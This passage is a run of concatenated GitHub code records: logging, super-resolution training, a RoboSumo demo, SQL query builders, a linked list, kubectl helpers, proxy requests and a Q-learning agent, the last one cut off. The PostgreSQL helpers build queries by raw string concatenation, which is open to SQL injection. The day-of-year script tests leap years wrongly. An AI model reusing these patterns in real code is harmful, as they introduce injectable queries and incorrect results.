\n    :returns: Log file with message.\n    :rtype: mixed\n    \"\"\"\n    logger = logging.getLogger(__name__)\n    logging.basicConfig(\n        level=logging.NOTSET,\n        format='🕒 %(asctime)s :~$ %(message)s',\n        datefmt='%Y-%m-%d %H:%M:%S',\n        filename='./logs/app.log'\n    )\n\n    if t == \"critical\":\n        data = logger.critical(f\"‼️ {m}\")\n    elif t == \"error\":\n        data = logger.error(f\"🔴 {m}\")\n    elif t == \"warning\":\n        data = logger.warning(f\"🟠 {m}\")\n    elif t == \"debug\":\n        data = logger.debug(f\"🐛 {m}\")\n    elif t == \"except\":\n        data = logger.exception(f\"❌ {m}\")\n    elif t == \"general\":\n        data = logger.info(f\"{m}\")\n    else:\n        data = logger.info(f\"🟢 {m}\")\n\n    return data\n\n\ndef tail(m):\n    \"\"\"\n    Document a log entry to the log file.\n\n    :param m: Log message text.\n    :type m: string\n\n    :returns: Log file with message.\n    :rtype: mixed\n    \"\"\"\n    logger = logging.getLogger(__name__)\n    logging.basicConfig(\n        level=logging.NOTSET,\n        format='%(message)s',\n        filename='./logs/app.log'\n    )\n\n    return logger.info(m)\n","repo_name":"justinhartman/cloudapp-webhook","sub_path":"modules/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"8506320121","text":"from torch.utils import data\nimport torch.optim as optim\nfrom SRdatasetRGB import SRdatasetRGB\nfrom lapsrn import *\nimport shutil\n\n\ndef save_ckp(state, is_best, checkpoint_path, best_model_path):\n    \"\"\"\n    state: checkpoint we want to save\n    is_best: is this the best checkpoint; min validation loss\n    checkpoint_path: path to save checkpoint\n    best_model_path: path to save best model\n    \"\"\"\n    f_path = checkpoint_path\n    # save checkpoint data to the path given, checkpoint_path\n    torch.save(state, f_path)\n    # if it is a best model, min validation loss\n    if is_best:\n        best_fpath = best_model_path\n        # copy that checkpoint file to best path given, best_model_path\n        shutil.copyfile(f_path, best_fpath)\n\n\ndef exp_lr_scheduler(optimizer, epoch, init_lr=0.001, lr_decay_epoch=100):\n    \"\"\"Decay learning rate by a factor of 2 every lr_decay_epoch epochs.\"\"\"\n    lr = init_lr * (0.5**(epoch // lr_decay_epoch))\n\n    if epoch % lr_decay_epoch == 0:\n        print('LR is set to {}'.format(lr))\n\n    for param_group in optimizer.param_groups:\n        param_group['lr'] = lr\n\n    return optimizer, lr\n\n\n# CUDA for PyTorch\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda:2\" if use_cuda else \"cpu\")\n\nmax_epochs = 1000\n\n# Generators\ntraining_set = SRdatasetRGB(\"train\")\ntraining_generator = data.DataLoader(training_set, batch_size=64, shuffle=True, num_workers=4, pin_memory=True)\n\nvalidation_set = SRdatasetRGB(\"validation\")\nvalidation_generator = data.DataLoader(validation_set, batch_size=64, shuffle=False, num_workers=1, pin_memory=True)\n\nnet = LapSrnMS(5, 5, 4)\n\nif use_cuda:\n    net.to(device)\n\ncriterion = CharbonnierLoss()\noptimizer = optim.Adam(net.parameters(), lr=1e-4, weight_decay=1e-4)\n\nif __name__ == '__main__':\n    # Loop over epochs\n    loss_min = np.inf\n    running_loss_valid = 0.0\n    for epoch in range(max_epochs):  # loop over the dataset multiple times\n        optimizer, current_lr = exp_lr_scheduler(optimizer, epoch, init_lr=1e-4, lr_decay_epoch=20)\n        running_loss_train = 0.0\n\n        net.train()\n\n        for i, data in enumerate(training_generator, 0):\n\n            # get the inputs; data is a 
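list of [in_lr, in_2x, in_4x, in_rgb] tensors:\n            # the low-res input, the 2x and 4x ground-truth targets, and the\n            # guidance RGB image, matching the unpacking on the next line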
\n            in_lr, in_2x, in_4x, in_rgb = data[0].to(device), data[1].to(device), data[2].to(device), data[3].to(device)\n\n            # in_lr.requires_grad = True\n            # zero the parameter gradients\n            optimizer.zero_grad()\n\n            # forward + backward + optimize\n            out_2x, out_4x = net(in_rgb, in_lr)\n            loss_2x = criterion(out_2x, in_2x)\n            loss_4x = criterion(out_4x, in_4x)\n\n            loss = (loss_2x + loss_4x) / in_lr.shape[0]\n\n            loss.backward()\n            # loss_2x.backward(retain_graph=True)\n\n            # loss_4x.backward()\n\n            # torch.nn.utils.clip_grad_norm_(net.parameters(), 0.01 / current_lr)\n\n            optimizer.step()\n\n            # print statistics\n            running_loss_train += loss.item()\n            if i % 100 == 99:    # print every 100 mini-batches\n                print('[%d, %5d] training loss: %.3f' %\n                      (epoch + 1, i + 1, running_loss_train / 100))\n                running_loss_train = 0.0\n\n        net.eval()\n\n        for j, data_valid in enumerate(validation_generator, 0):\n            # unpack the current validation batch\n            in_lr, in_2x, in_4x, in_rgb = data_valid[0].to(device), data_valid[1].to(device), data_valid[2].to(device), data_valid[3].to(device)\n\n            out_2x, out_4x = net(in_rgb, in_lr)\n            loss_2x = criterion(out_2x, in_2x)\n            loss_4x = criterion(out_4x, in_4x)\n\n            loss = (loss_2x + loss_4x) / in_lr.shape[0]\n\n            running_loss_valid += loss.item()\n\n        running_loss_valid = running_loss_valid / len(validation_generator)\n\n        print('[%d] validation loss: %.3f' %\n              (epoch + 1, running_loss_valid))\n\n        if running_loss_valid < loss_min:\n            checkpoint = {\n                'epoch': epoch + 1,\n                'valid_loss_min': running_loss_valid,\n                'state_dict': net.state_dict(),\n                'optimizer': optimizer.state_dict(),\n            }\n            save_ckp(checkpoint, True, \"ckp.pt\", \"best.pt\")\n            loss_min = running_loss_valid\n\n        running_loss_valid = 0.0\n\n    print('Finished Training')","repo_name":"lorenzomammana/RGB-IR-LapSRN","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"}
{"seq_id":"40964086161","text":"# Q :2331\n\n\nimport sys\n\n\ndef calc(num):\n    global p\n    num_arr = []\n    while num != 0:\n        num_arr.append(num%10)\n        num //= 10\n\n    result = 0\n    for x in num_arr:\n        result += x**p\n\n    return result\n\n\na, p = map(int, sys.stdin.readline().rstrip().split())\n\ngraph = [a]\nborder = -1\n\nwhile True:\n    val = calc(graph[-1])\n    for (i, e) in enumerate(graph):\n        if val == e:\n            border = i\n            break\n    if border != -1:\n        break\n    else:\n        graph.append(val)\n\nsys.stdout.write(str(border))","repo_name":"zerobell-lee/baekjoon-algorithm-study","sub_path":"repetive_seq.py","file_name":"repetive_seq.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"70238198672","text":"\"\"\"\nDemonstrates RoboSumo with pre-trained policies.\n\"\"\"\nimport click\nimport gym\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\nimport robosumo.envs\n\nfrom robosumo.policy_zoo import LSTMPolicy, MLPPolicy\nfrom robosumo.policy_zoo.utils import load_params, set_from_flat\n\nPOLICY_FUNC = {\n    \"mlp\": MLPPolicy,\n    \"lstm\": LSTMPolicy,\n}\n\n@click.command()\n@click.option(\"--env\", type=str,\n              default=\"RoboSumo-Ant-vs-Ant-v0\", show_default=True,\n              help=\"Name of the environment.\")\n@click.option(\"--policy-names\", nargs=2, type=click.Choice([\"mlp\", \"lstm\"]),\n              default=(\"mlp\", \"mlp\"), show_default=True,\n              help=\"Policy names.\")\n@click.option(\"--param-versions\", nargs=2, type=int,\n              default=(1, 1), show_default=True,\n              help=\"Policy parameter 
versions.\")\n@click.option(\"--max_episodes\", type=int,\n default=20, show_default=True,\n help=\"Number of episodes.\")\n\ndef main(env, policy_names, param_versions, max_episodes):\n # Construct paths to parameters\n curr_dir = os.path.dirname(os.path.realpath(__file__))\n params_dir = os.path.join(curr_dir, \"../robosumo/policy_zoo/assets\")\n agent_names = [env.split('-')[1].lower(), env.split('-')[3].lower()]\n param_paths = []\n for a, p, v in zip(agent_names, policy_names, param_versions):\n param_paths.append(\n os.path.join(params_dir, a, p, \"agent-params-v%d.npy\" % v)\n )\n\n # Create environment\n env = gym.make(env)\n\n for agent in env.agents:\n agent._adjust_z = -0.5\n\n tf_config = tf.ConfigProto(\n inter_op_parallelism_threads=1,\n intra_op_parallelism_threads=1)\n sess = tf.Session(config=tf_config)\n sess.__enter__()\n\n # Initialize policies\n policy = []\n for i, name in enumerate(policy_names):\n scope = \"policy\" + str(i)\n policy.append(\n POLICY_FUNC[name](scope=scope, reuse=False,\n ob_space=env.observation_space.spaces[i],\n ac_space=env.action_space.spaces[i],\n hiddens=[64, 64], normalize=True)\n )\n sess.run(tf.variables_initializer(tf.global_variables()))\n\n # Load policy parameters\n params = [load_params(path) for path in param_paths]\n for i in range(len(policy)):\n set_from_flat(policy[i].get_variables(), params[i])\n\n # Play matches between the agents\n num_episodes, nstep = 0, 0\n total_reward = [0.0 for _ in range(len(policy))]\n total_scores = [0 for _ in range(len(policy))]\n observation = env.reset()\n print(\"-\" * 5 + \"Episode %d \" % (num_episodes + 1) + \"-\" * 5)\n while num_episodes < max_episodes:\n env.render()\n action = tuple([\n pi.act(stochastic=True, observation=observation[i])[0]\n for i, pi in enumerate(policy)\n ])\n observation, reward, done, infos = env.step(action)\n\n nstep += 1\n for i in range(len(policy)):\n total_reward[i] += reward[i]\n if done[0]:\n num_episodes += 1\n draw = True\n for i in range(len(policy)):\n if 'winner' in infos[i]:\n draw = False\n total_scores[i] += 1\n print(\"Winner: Agent {}, Scores: {}, Total Episodes: {}\"\n .format(i, total_scores, num_episodes))\n if draw:\n print(\"Match tied: Agent {}, Scores: {}, Total Episodes: {}\"\n .format(i, total_scores, num_episodes))\n observation = env.reset()\n nstep = 0\n total_reward = [0.0 for _ in range(len(policy))]\n\n for i in range(len(policy)):\n policy[i].reset()\n\n if num_episodes < max_episodes:\n print(\"-\" * 5 + \"Episode %d \" % (num_episodes + 1) + \"-\" * 5)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"openai/robosumo","sub_path":"demos/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","stars":287,"dataset":"github-code","pt":"83"} +{"seq_id":"40386537776","text":"# exist function\n# 'val' should be written within '...', that is only accepts string value\n# set 'condition'=[condition_string] to overwrite the use of 'var'='val'\n# the [value] should be ended with \"'\", and [other_value] should not be ended by \"'\"\n# function return a value of 't' or 'f'\ndef exist(table,var='0',val='0',condition=None):\n if not condition:\n condition=\"\"\" WHERE \"\"\"+var+\"\"\"=\"\"\"+str(val)\n else:\n condition=\"\"\" WHERE \"\"\"+condition\n que=\"\"\"SELECT EXISTS (SELECT * FROM \"\"\"+table+condition+\"\"\")\"\"\"\n return que\n \n# count function\n# 'val' should be written within '...', that is only accepts string value\n# set 
\n# returns the assembled COUNT query string (executing it yields a single integer)\ndef count(table,var='0',val='0',condition=None):\n    if not condition:\n        condition=\"\"\" WHERE \"\"\"+var+\"\"\"=\"\"\"+str(val)\n    else:\n        condition=\"\"\" WHERE \"\"\"+condition\n    que=\"\"\"SELECT COUNT(*) FROM \"\"\"+table+condition\n    return que\n    \n# select function\n# 'val' must be passed as a quoted string literal, e.g. \"'abc'\"\n# set 'distinct'='yes' to perform SELECT DISTINCT...\n# set 'condition'=[condition_string] to overwrite the use of 'var'='val'\n# 'rows'=[integer] specifies how many rows should be selected\n# 'order'=[column_name] specifies which column should be a basis for sorting\n# returns the assembled SELECT query string\ndef select(table,column='*',var='0',val='0',distinct='no',rows=None,order=None,condition=None):\n    if distinct=='yes':\n        distinct=' DISTINCT'\n    elif distinct=='no':\n        distinct=\"\"\n    if not rows:\n        rows=\"\"\n    else:\n        rows=\"\"\" FETCH FIRST \"\"\"+str(rows)+\"\"\" ROWS ONLY\"\"\"\n    if not order:\n        order=\"\"\n    else:\n        order=\" ORDER BY \"+order\n    if not condition:\n        condition=\"\"\" WHERE \"\"\"+var+\"\"\"=\"\"\"+str(val)\n    else:\n        condition=\"\"\" WHERE \"\"\"+condition\n    que=\"\"\"SELECT\"\"\"+distinct+\"\"\" \"\"\"+column+\"\"\" FROM \"\"\"+table+condition+order+rows\n    return que\n    \n# delete one/several row satisfying given condition 'var'='val'.\n# 'val' must be passed as a quoted string literal, e.g. \"'abc'\"\n# set 'condition'=[condition_string] to overwrite the use of 'var'='val'\n# 'limit'=[integer] specifies how many rows (max) should be removed at a time\n# 'order'=[column_name] specifies which column should be a basis for sorting\n# returns the assembled DELETE query string\ndef delete(table,var='0',val='0',limit=None,order=None,condition=None):\n    lim_front=\"\"\n    lim_back=\"\"\n    order_by=\"\"\n    if not condition:\n        condition=\"\"\" WHERE \"\"\"+var+\"\"\"=\"\"\"+str(val)\n    else:\n        condition=\"\"\" WHERE \"\"\"+condition\n    if limit:\n        lim_front=\"\"\" WHERE ctid IN (SELECT ctid FROM \"\"\"+table\n        lim_back=\"\"\" LIMIT \"\"\"+str(limit)+\"\"\")\"\"\"\n    if order:\n        order_by=\"\"\" ORDER BY \"\"\"+order\n    que=\"\"\"DELETE FROM \"\"\"+table+lim_front+condition+order_by+lim_back\n    return que\n\n# insert values into their respective columns.\n# 'column' is a 1-D list, consisting of column names,\n#     column[column_number]\n# 'values' is a tuple of values to be inserted into columns,\n#     values[row_number][column_number]\n# returns the assembled INSERT query string\ndef insert(table,column,values):\n    col_str=\"\"\n    val_str=\"\"\n    for col in column:\n        col_str=col_str+col+\"\"\",\"\"\"\n    col_str=col_str[:len(col_str)-1]\n    for i in range(len(values)):\n        val_str+=\"\"\"(\"\"\"\n        for val in values[i]:\n            val_str+=\"\"\"\\'\"\"\"+str(val)+\"\"\"\\',\"\"\"\n        val_str=val_str[:len(val_str)-1]\n        val_str+=\"\"\"),\"\"\"\n    val_str=val_str[:len(val_str)-1]\n    que=\"\"\"INSERT INTO \"\"\"+table+\"\"\" (\"\"\"+col_str+\"\"\") VALUES \"\"\"+val_str\n    return que\n\n# update content(s) of a table satisfying given condition 'var'='val'.\n# 'val' must be passed as a quoted string literal, e.g. \"'abc'\"\n# set 'condition'=[condition_string] to overwrite the use of 'var'='val'\n# 'update' is a list (tuple) of column,value pair,\n#     [[col1,val1],[col2,val2],[col3,val3],...]\n# returns the assembled UPDATE query string\ndef update(table,update,var='0',val='0',condition=None):\n    upd_pairs=\"\"\n    if not condition:\n        condition=\"\"\" WHERE \"\"\"+var+\"\"\"=\"\"\"+str(val)\n    else:\n        condition=\"\"\" 
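WHERE \"\"\"+condition\n    # e.g. update('rpi_ongoing', [['bar_code', 999]], condition=\"c_locator_id=''\")\n    # assembles: UPDATE rpi_ongoing SET bar_code='999' WHERE c_locator_id=''\n    # (values mirror the debug block at the bottom of this file)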
WHERE \"\"\"+condition\n for set in update:\n upd_pairs+=set[0]+\"\"\"=\\'\"\"\"+str(set[1])+\"\"\"\\',\"\"\"\n upd_pairs=upd_pairs[:len(upd_pairs)-1]\n que=\"\"\"UPDATE \"\"\"+table+\"\"\" SET \"\"\"+upd_pairs+condition\n return que\n\ndef split_col(dum):\n row=len(dum)\n col=len(dum[0])\n ddum=[[None]]*col\n for i in range(col):\n dddum=[None]*row\n for j in range(row):\n dddum[j]=dum[j][i]\n ddum[i]=dddum\n return ddum\n\n# FOR DEBUGGING ONLY\nif __name__ == '__main__':\n upd_list=[['bar_code',999],['c_locator_id',\"\"\"13000 \"\"\"]]\n con_var='c_locator_id'\n con_val=\"\"\"\\'\\'\"\"\"\n que=update('rpi_ongoing',upd_list,var=con_var,val=con_val)\n print(que)\n","repo_name":"vongalung/PickByLight","sub_path":"modules/psql/psql_functions.py","file_name":"psql_functions.py","file_ext":"py","file_size_in_byte":4888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"31265944755","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass SinglyLinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n\n def push_front(self, data):\n node = Node(data)\n if not self.head:\n self.tail = self.head = node\n return\n\n if not self.head.next:\n node.next = self.tail\n self.head = node\n return \n\n node.next = self.head\n self.head = node\n\n def push_back(self, data):\n node = Node(data)\n if not self.head:\n self.tail = self.head = node\n return\n\n if not self.head.next:\n self.head.next = self.tail = node\n return \n\n self.tail.next = node\n self.tail = node\n\n def pop_front(self):\n if not self.head:\n return\n\n if self.head == self.tail:\n self.head = self.tail = None\n return\n\n node = self.head\n self.head = node.next\n del node\n\n def pop_back(self):\n if not self.head:\n return\n\n if self.head == self.tail:\n self.head = self.tail = None\n return\n\n node = self.head\n while node.next != self.tail:\n node = node.next\n\n self.tail = node\n del node.next\n node.next = None\n\n def insert(self, data, index):\n if index == 0:\n self.push_front(data)\n return\n if not self.get_node(index):\n return\n\n node = Node(data)\n left = self.get_node(index)\n right = left.next\n\n left.next = node\n node.next = right\n\n def erase(self, index):\n if not self.head or index < 0:\n return\n\n if index == 0 and not self.head.next:\n self.pop_front()\n return\n\n left = self.get_node(index)\n if not left or not left.next:\n return\n\n right = left.next.next\n\n del left.next\n left.next = right\n\n def get_node(self, index):\n count = 0\n node = self.head\n\n while count != index - 1:\n if not node:\n return None\n node = node.next\n count +=1\n\n if not node or (not node.next and node != self.head):\n return None\n\n return node\n\n def __str__(self):\n \"\"\" [data] -> [data] -> None \"\"\"\n\n node = self.head\n lst = \"\"\n while node:\n lst += f\"[{node.data}] -> \"\n node = node.next\n\n return lst + f\"[None]\"\n\n","repo_name":"TaV3z/datastructs","sub_path":"linked_list/singly_linked_list.py","file_name":"singly_linked_list.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"8642095183","text":"'''\r\nCreated on Oct 21, 2017\r\n\r\n@author: BHUSHAN\r\n'''\r\nfrom tkinter import *\r\nfrom bhushan.gmail.ui import authorizeClickHandler \r\n\r\nwindow=Tk()\r\nwindow.geometry(\"800x500\")\r\nwindow.resizable(0,0)\r\nwindow.title(\"Welcome to the GMAIL Data Mining\")\r\n#making 
frames to seperate the connect button and welcome msg\r\n#topFrame=Frame(window)\r\n#topFrame.pack()\r\n\r\n#bottomFrame=Frame(window)\r\n#bottomFrame.pack(side=BOTTOM)\r\n\r\n\r\n#welcome message\r\nWelcomeText=Label(window,text=\"Welcome to the GMAIL Data Mining ..!!\")\r\nWelcomeText.config(font=(\"Courier\", 24))\r\nWelcomeText.grid(row=0,column=0)\r\nWelcomeText.grid(padx=50, pady=50)\r\n\r\n#connect button to authorize the account\r\nConnectButton=Button(window,command=authorizeClickHandler.buttonClick(),text=\"Connect to get insights of your GMAIL Account\",fg='green',bg='black')\r\nConnectButton.config(font=(\"Courier\", 12))\r\nConnectButton.grid(row=1,column=0)\r\nConnectButton.grid(padx=20, pady=120)\r\n\r\nwindow.mainloop()\r\n\r\n","repo_name":"bhushanpawar007/GmailAPI","sub_path":"GmailAPI/bhushan/gmail/ui/LoginPage.py","file_name":"LoginPage.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"22582323476","text":"# common utility functions\n\nimport subprocess\nimport time\nfrom inspect import getframeinfo, stack\nfrom pathlib import Path\n\nimport yaml\nfrom logzero import logger\n\n\ndef kubectl(args, print_output=True, print_error=True):\n \"\"\"Run kubectl command.\"\"\"\n caller = getframeinfo(stack()[1][0])\n caller_module = Path(caller.filename).stem\n c = f\"[{caller_module}:{caller.lineno}] \"\n command = [\"kubectl\"]\n command.extend(args)\n logger.debug(\" \".join(command))\n process = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n if print_output:\n if process.stdout != b\"\":\n logger.info(c + process.stdout.decode(\"ascii\"))\n if process.stderr != b\"\":\n logger.error(c + process.stderr.decode(\"ascii\"))\n return process\n\n\ndef wait_for_k8s_resource(\n type, name, namespace=\"istio-system\", instances=1, timeout=600\n):\n \"\"\"Wait for a k8s resource to be ready\"\"\"\n\n while True and timeout > 0:\n timeout -= 1\n process = kubectl(\n [\"get\", type, \"-n\", namespace, name, \"-o\", \"yaml\"],\n print_output=False,\n )\n if process.returncode != 0:\n time.sleep(1)\n print(\"|\", end=\"\", flush=True)\n continue\n result = yaml.safe_load(process.stdout)\n\n if (\n \"readyReplicas\" in result[\"status\"]\n and result[\"status\"][\"readyReplicas\"] == instances\n ):\n break\n time.sleep(1)\n print(\".\", end=\"\", flush=True)\n return 0 if timeout > 0 else 1\n","repo_name":"oneconvergence/dkube_cli","sub_path":"dkube_cli/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"17420264653","text":"from flask_sqlalchemy import SQLAlchemy\nfrom src.utils import retry\nfrom src import app\n\n\n@retry(10, exceptions=(Exception))\ndef getDb():\n return SQLAlchemy(app)\n\n\ndb = getDb()\n\n\nclass User(db.Model):\n __tablename__ = \"users\"\n\n id = db.Column(db.Integer, primary_key=True)\n email = db.Column(db.String(128), unique=True, nullable=False)\n active = db.Column(db.Boolean(), default=True, nullable=False)\n\n def __init__(self, email):\n self.email = email\n","repo_name":"pspankov/flask_docker_bootstrap","sub_path":"src/postgres.py","file_name":"postgres.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29144500623","text":"# 代理是绕过IP封锁的一种手段\nimport requests\n\n# 寻找免费代理IP\n# ip: 52.183.8.192\n# 
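One fix worth calling out in the Tkinter login page above: `command=authorizeClickHandler.buttonClick()` calls the handler immediately, while the window is still being built, and binds its return value (normally `None`) to the button. The callback must be passed uncalled. A minimal corrected sketch, where `on_connect` is a stand-in for the real handler:

```python
import tkinter as tk

def on_connect():
    print("authorize clicked")   # stand-in for authorizeClickHandler.buttonClick

if __name__ == "__main__":
    window = tk.Tk()
    # Pass the function object itself, with no parentheses, so Tk calls it
    # on click instead of once at construction time.
    tk.Button(window, text="Connect", command=on_connect).pack()
    window.mainloop()
```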
port: 3128\n\nproxies = {\n \"https\": \"https://52.183.8.192:3128\"\n}\n\nmain_page = requests.get(\"https://www.baidu.com\", proxies=proxies)\nmain_page.encoding = \"utf-8\"\nprint(main_page.text)","repo_name":"AlexT11223344/My_python_project","sub_path":"WebCrawler/15_agent.py","file_name":"15_agent.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27095898686","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nadama\n=====\n\nDefines the base logic of the library to launch orders from command line or\ndirectly in Python scripts\n\"\"\"\n\nimport sys\nimport os\n\nfrom .commandment import Commander, QG\nfrom .exceptions import UnknownOrderError\n\n\nVERSION = ('0', '3', '2', 'beta')\n\n\ndef get_version(command=''):\n \"\"\"Human readable version\n \"\"\"\n version = '.'.join(element for element in VERSION[:3])\n return '{0} {1}'.format(command, version) if command else version\n\n\ndef sir_yes_sir(module='', doc='', options=(), version='', argv=None):\n \"\"\"Launches the right order or displaying the help for a command or an\n order directly from command line.\n \"\"\"\n argv = argv if argv is not None else sys.argv[:]\n command = os.path.basename(argv[0])\n module = module if module else command\n commander = Commander(module, doc=doc, command=command)\n\n # global options and app version made available for the orders\n QG.options = options\n QG.version = version\n\n no_arg = len(argv) == 1\n needs_help = not no_arg and argv[1] == 'help'\n global_help = needs_help and len(argv) == 2\n order_help = needs_help and len(argv) > 2\n\n if no_arg or global_help:\n return commander.explanations()\n else:\n order_name = argv[1] if not order_help else argv[2]\n try:\n order = commander[order_name]\n except UnknownOrderError as uoe:\n return uoe()\n else:\n if order_help:\n return order.explanations()\n else:\n return order(argv[2:])\n\n\ndef call_order(module_name, order_name, *args, **kwargs):\n \"\"\"Calls an order from another python script directly\n \"\"\"\n commander = Commander(module_name)\n order = commander[order_name]\n return order.execute(*args, **kwargs)\n","repo_name":"agrausem/adama","sub_path":"src/adama/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"30598429318","text":"from datetime import datetime\nfrom prettytable import PrettyTable\nimport json\n\n\ndef parsJsonFile(filename):\n with open(filename, 'r', encoding='utf-8') as f:\n dictName = json.load(f)\n return dictName\n\n\ndef parsTxtFile(filename):\n with open(filename, 'r', encoding='utf-8-sig') as f:\n result = {}\n for line in f:\n tempList = line.split()\n if tempList[1] == 'start':\n if tempList[0] in result:\n result[tempList[0]] = getResultTime(tempList[2],\n result[tempList[0]])\n else:\n result[tempList[0]] = tempList[2]\n elif tempList[1] == 'finish':\n if tempList[0] in result:\n result[tempList[0]] = getResultTime(result[tempList[0]],\n tempList[2])\n else:\n result[tempList[0]] = tempList[2]\n\n sorted_tuples = sorted(result.items(), key=lambda item: item[1])\n return sorted_tuples\n\n\ndef getResultTime(start, finish):\n start_ = datetime.strptime(start, '%H:%M:%S,%f')\n finish_ = datetime.strptime(finish, '%H:%M:%S,%f')\n return str(finish_ - start_)\n\n\ndef printResultTables(dictNames, sortedTupleDatesResults):\n table = PrettyTable()\n table.field_names = [\n 
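A note on the proxy snippet above (its Chinese comments say that a proxy is one way around IP blocking, and to look up a free proxy IP first): with requests, the dict keys select the *target* URL's scheme, while the proxy's own address is conventionally written `http://host:port` even when it carries https traffic, since the library tunnels via CONNECT. A conventional sketch, reusing the same illustrative address:

```python
import requests

proxy = "http://52.183.8.192:3128"         # illustrative free-proxy address
proxies = {"http": proxy, "https": proxy}  # route both schemes through it

resp = requests.get("https://www.baidu.com", proxies=proxies, timeout=10)
resp.encoding = "utf-8"
print(resp.status_code)
```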
'Занятое место',\n 'Нагрудный номер',\n 'Имя',\n 'Фамилия',\n 'Результат'\n ]\n for i, elem in enumerate(sortedTupleDatesResults):\n table.add_row([\n i + 1,\n elem[0],\n dictNames[elem[0]]['Surname'],\n dictNames[elem[0]]['Name'],\n elem[1]\n ])\n print(table)\n\n\nif __name__ == '__main__':\n sortedTupleDatesResults = parsTxtFile('results_RUN.txt')\n dictNames = parsJsonFile('competitors2.json')\n printResultTables(dictNames, sortedTupleDatesResults)\n","repo_name":"trueoss23/Test_Task_Python","sub_path":"src/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21526659949","text":"#!/usr/bin/python3\r\n# -*- coding: UTF-8 -*-\r\n\r\nyear = int(input('year:\\n'))\r\nmonth = int(input('month:\\n'))\r\nday = int(input('day:\\n'))\r\nmonths = (0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334)\r\nif 0 < month <= 12:\r\n sumd = months[month - 1]\r\n print(sumd)\r\nelse:\r\n print('data error')\r\n\r\nsumd += day\r\nleap = 0\r\nif (year % 400 == 0) or (year % 4 == 0) or (year % 100 != 0):\r\n leap = 1\r\nif (leap == 1) and month > 2:\r\n sumd += 1\r\nprint('it is the %dth day.' % sumd)\r\n","repo_name":"Junli1793/python100q","sub_path":"100q/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"7780923965","text":"import numpy as np\r\nfrom ipywidgets import IntText, IntSlider, Button, HBox, Output\r\nfrom IPython.display import display, clear_output\r\nimport matplotlib.pyplot as plt\r\nimport gym\r\n\r\nclass Agent():\r\n def __init__(self, map):\r\n self.__env = gym.make('FrozenLake-v1', desc=map, render_mode='rgb_array', is_slippery=False)\r\n self.__env.reset()\r\n \r\n self.__action_size = self.__env.action_space.n\r\n self.__observation_size = self.__env.observation_space.n\r\n self.__Q = np.zeros([self.__observation_size, self.__action_size])\r\n \r\n self.__epsilon = 1\r\n self.__alpha = 0.95\r\n self.__gamma = 0.8\r\n self.__lamb = 0.9\r\n self.__epsilon_update = 1000\r\n self.__episode_rewards = []\r\n self.__show_interval = 1000\r\n self.__plot_interval = 1000\r\n \r\n self.__episode = IntSlider(\r\n value=0,\r\n min=0,\r\n max=100000,\r\n step=1,\r\n disabled = True\r\n )\r\n \r\n self.__N_episode = IntText(\r\n value=10000,\r\n description='학습횟수:',\r\n disabled=False\r\n )\r\n \r\n self.__learn_button = Button(\r\n description='학습하기',\r\n disabled=False\r\n )\r\n \r\n self.__test_button = Button(\r\n description='테스트하기',\r\n disabled=False\r\n )\r\n \r\n self.__out = Output()\r\n display(HBox([self.__learn_button, self.__N_episode, self.__episode]), self.__test_button, self.__out)\r\n self.__learn_button.on_click(self.__learn)\r\n self.__test_button.on_click(self.__test)\r\n\r\n def __epsilon_greedy(self, state):\r\n if np.random.rand() > self.__epsilon:\r\n return np.argmax(self.__Q[state, :])\r\n else:\r\n return self.__env.action_space.sample()\r\n \r\n def __learn(self, button):\r\n for _ in range(self.__N_episode.value):\r\n self.__env.reset()\r\n state = 0\r\n rewards = []\r\n done = False\r\n\r\n if self.__episode.value % self.__epsilon_update == 0:\r\n self.__epsilon *= self.__lamb\r\n\r\n if self.__episode.value % self.__plot_interval == 0:\r\n self.__show()\r\n with self.__out:\r\n print(self.__Q)\r\n\r\n while not done:\r\n action = self.__epsilon_greedy(state)\r\n next_state, reward, done, _, info = 
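The day-of-year sample above has a buggy leap-year test: `(year % 400 == 0) or (year % 4 == 0) or (year % 100 != 0)` is true for nearly every year (2023 passes via the last clause), because the last two conditions should be joined with `and`. The standard Gregorian rule:

```python
def is_leap(year):
    # Leap years: divisible by 4, except centuries, unless divisible by 400.
    return year % 400 == 0 or (year % 4 == 0 and year % 100 != 0)

# Equivalent to the standard library's calendar.isleap.
assert is_leap(2000) and is_leap(2024)
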